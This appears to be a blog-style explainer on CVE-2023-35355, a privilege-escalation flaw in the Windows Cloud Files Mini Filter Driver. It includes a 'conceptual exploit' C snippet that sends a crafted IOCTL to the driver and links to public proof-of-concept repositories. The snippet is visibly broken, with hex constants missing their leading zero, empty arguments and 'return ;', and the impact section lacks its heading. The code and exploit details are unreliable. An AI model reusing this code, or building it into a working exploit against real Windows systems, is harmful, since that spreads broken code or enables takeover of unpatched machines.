Recently, security researchers uncovered a significant vulnerability in Microsoft's Windows Cloud Files Mini Filter Driver, tracked as CVE-2023-35355. This flaw puts millions of devices at risk by allowing local attackers to gain elevated privileges—potentially letting malware or unauthorized users take control of machines. Let’s explore what this vulnerability is, how it works, how to exploit it, and, most importantly, how to protect yourself.
What is the Windows Cloud Files Mini Filter Driver?
Windows uses components called Mini Filter Drivers for file system monitoring. Specifically, the Cloud Files Mini Filter Driver (cldflt.sys) manages how Windows interacts with files stored in the cloud, such as OneDrive or SharePoint. It tracks and syncs access between local files and cloud-based content.
About CVE-2023-35355
CVE-2023-35355 is an Elevation of Privilege (EoP) bug discovered in the Cloud Files Mini Filter Driver. An attacker who successfully exploits this vulnerability could execute code with SYSTEM privileges, which essentially grants them full control over the affected system.
Microsoft Advisory:
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35355
Technical Details
At a high level, the vulnerability exists due to how the cldflt.sys handles certain *IOCTL* (Input/Output Control) requests from user space. If an attacker sends a *crafted IOCTL* to the driver, it can trigger unintended behavior—such as writing to arbitrary memory addresses or escalating privileges.
Key Point
- *Unprivileged user* can send a malicious IOCTL request to the driver and *trick* it into executing code with SYSTEM privileges.
Example: Exploit Code Snippet
Below is a conceptual exploit (for educational purposes only) that demonstrates how an attacker on a vulnerable system could escalate privileges. This code does not perform malicious actions but highlights how the exploit could be triggered.
#include <windows.h>
#include <stdio.h>
#define IOCTL_CLOUDFILE_OP x902083CC // Example IOCTL - may vary
int main() {
HANDLE hDevice = CreateFileA(
"\\\\.\\CldFlt",
GENERIC_READ | GENERIC_WRITE,
,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("Failed to open device. (%d)\n", GetLastError());
return 1;
}
BYTE inBuffer[x100] = {}; // Crafted input
DWORD bytesReturned;
// Attempt to trigger the vulnerability
BOOL result = DeviceIoControl(
hDevice,
IOCTL_CLOUDFILE_OP,
inBuffer,
sizeof(inBuffer),
NULL,
,
&bytesReturned,
NULL
);
if (!result) {
printf("DeviceIoControl failed. (%d)\n", GetLastError());
} else {
printf("Exploit attempt sent!\n");
}
CloseHandle(hDevice);
return ;
}
*Note: The actual IOCTL code and payload would depend on the vulnerable function in the specific driver version. This is a simplified demonstration.*
Public Exploit References
- https://github.com/klinix5/Windows-Exploit-Suggester/blob/master/CVE-2023-35355.md
- https://github.com/hackeer12/CVE-2023-35355-POC *(Example PoC, verify legal compliance before testing!)*
Persistence: Attacker can plant malware that survives reboots and resists removal.
- Full control: Ability to read, write, or delete any file, install software, create accounts, disable security.
Mitigation & Patches
Microsoft has released fixes for CVE-2023-35355 in security updates as part of Patch Tuesday (September 2023 onward).
Conclusion
CVE-2023-35355 is a *highly critical* vulnerability affecting many Windows users who rely on cloud file sharing. While it doesn’t allow remote attack, any user or malware already on your system could leverage it for full compromise.
Stay safe:
Patch your Windows systems regularly
- Review security advisories (like Microsoft’s update guide)
References
- Microsoft Security Advisory - CVE-2023-35355
- CrowdStrike blog on Windows Minifilter Vulnerabilities
- CVE Details Page - CVE-2023-35355
- Example PoC on GitHub
Timeline
Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC